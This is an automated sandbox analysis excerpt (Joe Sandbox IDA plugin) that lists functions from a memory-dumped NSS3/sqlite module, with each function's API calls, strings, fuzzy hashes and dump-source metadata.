PR_Unlock.NSS3 ref: 6C7DADC0
free.MOZGLUE(00000000), ref: 6C7DAE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C7DAE58
free.MOZGLUE(00000000), ref: 6C7DAE69
free.MOZGLUE(?), ref: 6C7DAE78
PR_Unlock.NSS3 ref: 6C7DAE8C
free.MOZGLUE(?), ref: 6C7DAEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7DAEC7

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: d0264f332ec31053390aa0d8edb7b6e082871fbeb2bf6c8384cf65db53826d3a
Instruction ID: dc10e7e46d6365a0f3f95942825600f109c4e5d77be3685c14eb9efd92a214e0
Opcode Fuzzy Hash: d0264f332ec31053390aa0d8edb7b6e082871fbeb2bf6c8384cf65db53826d3a
Instruction Fuzzy Hash: B451C3B0E052168BDF10EF68DA4666E77B8BB06369F254535D808A7B00D331F915CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C81ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C81ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C81AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C81AE29

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C81AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C81AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C81AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C81AEA0

Strings

(CK_INVALID_HANDLE), xrefs: 6C81AE1F, 6C81AE80
C_MessageSignInit, xrefs: 6C81ADE1
hSession = 0x%x, xrefs: 6C81AE01, 6C81AE11
hKey = 0x%x, xrefs: 6C81AE62, 6C81AE72

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: 42f94d32856504b85f721a78497d0735ae3e73ce85d838d88c0fe13475e4b27b
Instruction ID: bcaebca32cf3b7ba7732c3751ba6f7ad760976a12fb34053966e6ae1aea2f7de
Opcode Fuzzy Hash: 42f94d32856504b85f721a78497d0735ae3e73ce85d838d88c0fe13475e4b27b
Instruction Fuzzy Hash: E331D731709105EFCB21AF58DE48BEA37F5BB4571DF548839E50997A01D730990DCB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C8B4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C8B4CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C8B4CFD
sqlite3_value_text16.NSS3(?), ref: 6C8B4D44

Strings

bad parameter or other API misuse, xrefs: 6C8B4D05
unknown error, xrefs: 6C8B4D56
no more rows available, xrefs: 6C8B4D2E
API call with %s database connection pointer, xrefs: 6C8B4CF6
out of memory, xrefs: 6C8B4C78, 6C8B4C9E
abort due to ROLLBACK, xrefs: 6C8B4D27, 6C8B4D33
another row available, xrefs: 6C8B4D20
invalid, xrefs: 6C8B4CF1

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: fb79d5b6a87d18258edfb1cd232ae805d262bd7c8a3e8d4da69c3200b54bc395
Instruction ID: 542da60088a5c30ad84112393596eb35ba513d0024b106f3b90e05c18c0e21dd
Opcode Fuzzy Hash: fb79d5b6a87d18258edfb1cd232ae805d262bd7c8a3e8d4da69c3200b54bc395
Instruction Fuzzy Hash: 91316873A48914A7E7344624AB277A47361BBC2719F1A0D29D8247BF19C734FC16C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 6C812DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C812DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C812E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C812E33

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C812E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C812E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C812E81

Strings

(CK_INVALID_HANDLE), xrefs: 6C812E2C
ulPinLen = %d, xrefs: 6C812E7C
hSession = 0x%x, xrefs: 6C812E0E, 6C812E1E
pPin = 0x%p, xrefs: 6C812E63
C_InitPIN, xrefs: 6C812DF1

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: e0811aaa1506cace15aba99b2fe7b647bc3cefdb8b97214df3264dd8e0c88697
Instruction ID: f9c46ce90fa60569b6ce52986bb8a98676734fb61a53d4b416446ef85f32b4a5
Opcode Fuzzy Hash: e0811aaa1506cace15aba99b2fe7b647bc3cefdb8b97214df3264dd8e0c88697
Instruction Fuzzy Hash: 3831E475609159EFCB20AB58DE4CB5A37F5EB4631DF148834E808A7A12DB34D909CA92

Uniqueness

Uniqueness Score: -1.00%

Function 6C816EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C816F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C816F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C816F53

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C816F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C816F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C816FA1

Strings

(CK_INVALID_HANDLE), xrefs: 6C816F4C
pPart = 0x%p, xrefs: 6C816F83
ulPartLen = %d, xrefs: 6C816F9C
C_DigestUpdate, xrefs: 6C816F11
hSession = 0x%x, xrefs: 6C816F2E, 6C816F3E

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 481ebc372670a639495ce28a9d3597392809ca2e34c8a8a4f8d7754721e525cf
Instruction ID: a3ad9026577c0c88441877c33e89d2e351b4a0d3f322e6e194817144304196b3
Opcode Fuzzy Hash: 481ebc372670a639495ce28a9d3597392809ca2e34c8a8a4f8d7754721e525cf
Instruction Fuzzy Hash: 2831C435709105DFDB20AB28DE48B9A37F5EB4635DF188839E808E7A12DB30D949CA91

Uniqueness

Uniqueness Score: -1.00%

Function 6C782450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C7824BA
LeaveCriticalSection.KERNEL32(?), ref: 6C78250D
EnterCriticalSection.KERNEL32(?), ref: 6C782554
LeaveCriticalSection.KERNEL32(?), ref: 6C7825A7
EnterCriticalSection.KERNEL32(?), ref: 6C782609
LeaveCriticalSection.KERNEL32(?), ref: 6C78265F
EnterCriticalSection.KERNEL32(?), ref: 6C7826A2
LeaveCriticalSection.KERNEL32(?), ref: 6C7826F5
EnterCriticalSection.KERNEL32(?), ref: 6C782764
LeaveCriticalSection.KERNEL32(?), ref: 6C782898
EnterCriticalSection.KERNEL32(?), ref: 6C7828D0
EnterCriticalSection.KERNEL32(?), ref: 6C782948
LeaveCriticalSection.KERNEL32(?), ref: 6C78299B
EnterCriticalSection.KERNEL32(?), ref: 6C7829E2
LeaveCriticalSection.KERNEL32(?), ref: 6C782A31

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 2a588ab4a5c239173039c2265f708212b4f79cfe7830374b45243e67f4fb71d9
Instruction ID: 2d875ccb4e5880a70611d8dcce8706512be9747a3a5267db2f11ea8d8b7af456
Opcode Fuzzy Hash: 2a588ab4a5c239173039c2265f708212b4f79cfe7830374b45243e67f4fb71d9
Instruction Fuzzy Hash: 86F18231B4E510CBDB14AF61EA8DA6A3731BF4731EB28413DDA0A57A40CB399D51CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C84E400 Relevance: 18.2, APIs: 12, Instructions: 206threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C84C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C84DAE2,?), ref: 6C84C6C2

SECOID_GetAlgorithmTag_Util.NSS3(-000000D8), ref: 6C84E4A0
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C84E4B1
SECOID_GetAlgorithmTag_Util.NSS3(-00000010), ref: 6C84E4C4
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C84E4D2
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,00000000), ref: 6C84E525
PK11_FreeSymKey.NSS3(00000000), ref: 6C84E592
PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C84E5CF
PR_GetCurrentThread.NSS3 ref: 6C84E5F2
PR_SetError.NSS3(00000000,00000000), ref: 6C84E601
PK11_PubUnwrapSymKey.NSS3(?,?,-00000001,00000105,00000000), ref: 6C84E620
PR_GetCurrentThread.NSS3 ref: 6C84E632
PR_SetError.NSS3(00000000,00000000), ref: 6C84E641

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Tag_$AlgorithmK11_$CurrentErrorFindFreeThread$DestroyPrivateUnwrap
String ID:
API String ID: 2900466288-0
Opcode ID: c8999f35e2ec4982b56d46628170bcbbc83c099e717c15ab922a7ab27f87fb8f
Instruction ID: 32068835b896a0253d327886dce0642c8c49a2935776dbb3e2dc9db25b594581
Opcode Fuzzy Hash: c8999f35e2ec4982b56d46628170bcbbc83c099e717c15ab922a7ab27f87fb8f
Instruction Fuzzy Hash: 7A61A5B19016099FDB20CF6CDE84A6BB7A8AF04208B554D39D80697B52F735E905CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8B2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C8B2D9F

Part of subcall function 6C76CA30: EnterCriticalSection.KERNEL32(?,?,?,6C7CF9C9,?,6C7CF4DA,6C7CF9C9,?,?,6C79369A), ref: 6C76CA7A
Part of subcall function 6C76CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C76CB26

sqlite3_exec.NSS3(?,?,6C8B2F70,?,?), ref: 6C8B2DF9
sqlite3_free.NSS3(00000000), ref: 6C8B2E2C
sqlite3_free.NSS3(?), ref: 6C8B2E3A
sqlite3_free.NSS3(?), ref: 6C8B2E52
sqlite3_mprintf.NSS3(6C91AAF9,?), ref: 6C8B2E62
sqlite3_free.NSS3(?), ref: 6C8B2E70
sqlite3_free.NSS3(?), ref: 6C8B2E89
sqlite3_free.NSS3(?), ref: 6C8B2EBB
sqlite3_free.NSS3(?), ref: 6C8B2ECB
sqlite3_free.NSS3(00000000), ref: 6C8B2F3E
sqlite3_free.NSS3(?), ref: 6C8B2F4C

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 9118ccc941891aca9ebb237c091db007be5051896df781278be735dfbe74d030
Instruction ID: 3eb8dbe8cc7b6cf0f5a259349d1ab17c2de8939aa4a1c73473e30608c88cb5b4
Opcode Fuzzy Hash: 9118ccc941891aca9ebb237c091db007be5051896df781278be735dfbe74d030
Instruction Fuzzy Hash: A96184B5E012098BEB20CF69DA88BDE77B5EF58348F144424EC15B7B01E739E855CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C802C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C803F23,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802C62
EnterCriticalSection.KERNEL32(0000001C,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802C76
PL_HashTableLookup.NSS3(00000000,?,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802C93

Part of subcall function 6C88DD70: TlsGetValue.KERNEL32 ref: 6C88DD8C
Part of subcall function 6C88DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C88DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23,?), ref: 6C802CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C7FE477,?,?,?,00000001,00000000,?,?,6C803F23), ref: 6C802CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C7FE477,?,?,?,00000001,00000000,?), ref: 6C802CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C7FE477,?,?,?,00000001,00000000,?), ref: 6C802D4D
EnterCriticalSection.KERNEL32(?), ref: 6C802D61
PL_HashTableLookup.NSS3(?,?), ref: 6C802D71
PR_Unlock.NSS3(?), ref: 6C802D7E

Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07AD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07CD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07D6
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C76204A), ref: 6C7D07E4
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,6C76204A), ref: 6C7D0864
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7D0880
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C76204A), ref: 6C7D08CB
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08D7
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08FB

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 573cec3662557a400331184ca5b0cf8df1f9e4ce474e178a16f73e32a20cc112
Instruction ID: f3ad82638e1e54e9e74a460e6dcfe3aeee7590d12630d3a87b18bca322b385cc
Opcode Fuzzy Hash: 573cec3662557a400331184ca5b0cf8df1f9e4ce474e178a16f73e32a20cc112
Instruction Fuzzy Hash: 995127B6E00205ABEB209F24DD888AA7778BF1535CF158924EC1897B11F731ED64CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C764C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764CB0
PR_Unlock.NSS3(?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764D97
PR_Lock.NSS3(?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764DBA
PR_WaitCondVar.NSS3 ref: 6C764DD4
PR_Unlock.NSS3(?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764DEF

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 1ca6946c80159a11b6134ed1cac13dff1e4e402027c48ad6cc99762d8ff8103e
Instruction ID: c00713e11b88da0c374ff48f0242ca35bda134636493354cbffc5a9ad06d5953
Opcode Fuzzy Hash: 1ca6946c80159a11b6134ed1cac13dff1e4e402027c48ad6cc99762d8ff8103e
Instruction Fuzzy Hash: A8418CB1A18A15CFCB10FF79D298559BBF4BF06318F158A69DC889BB00E730D895CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D0600 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 84stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 6C7D0623
GetLastError.KERNEL32(?,?,?,?,?,6C7D05E2), ref: 6C7D0642
TlsGetValue.KERNEL32(?,?,?,?,?,6C7D05E2), ref: 6C7D065D
GetLastError.KERNEL32 ref: 6C7D0678
PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C7D068A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7D0693
PR_SetErrorText.NSS3(00000000,?), ref: 6C7D069D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,052D3AB7,?,?,?,?,?,6C7D05E2), ref: 6C7D06CA
PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C7D05E2), ref: 6C7D06E6

Strings

error %d, xrefs: 6C7D0682

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Error$Last$AddressProcR_snprintfTextValuestrcmpstrlen
String ID: error %d
API String ID: 4000364758-2147592115
Opcode ID: 84077698fbd2520c448886cd24b45a845520ed1b411d6dabf8c9e5da7b347454
Instruction ID: 2a3a4a123ddc08a544c96e23d9abec7ee262ffc91193e6564fb343b84cfabca5
Opcode Fuzzy Hash: 84077698fbd2520c448886cd24b45a845520ed1b411d6dabf8c9e5da7b347454
Instruction Fuzzy Hash: 3E212971E041549BDB107B3E9E08A6A77B4AFC231DF261574E81897A51FB30F414C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6C82ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C82DE64), ref: 6C82ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C82ED22

Part of subcall function 6C83B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9118D0,?), ref: 6C83B095

PL_FreeArenaPool.NSS3(?), ref: 6C82ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C82ED6B
PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C82ED38

Part of subcall function 6C764C70: TlsGetValue.KERNEL32(?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764C97
Part of subcall function 6C764C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764CB0
Part of subcall function 6C764C70: PR_Unlock.NSS3(?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C82ED52
PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C82ED83
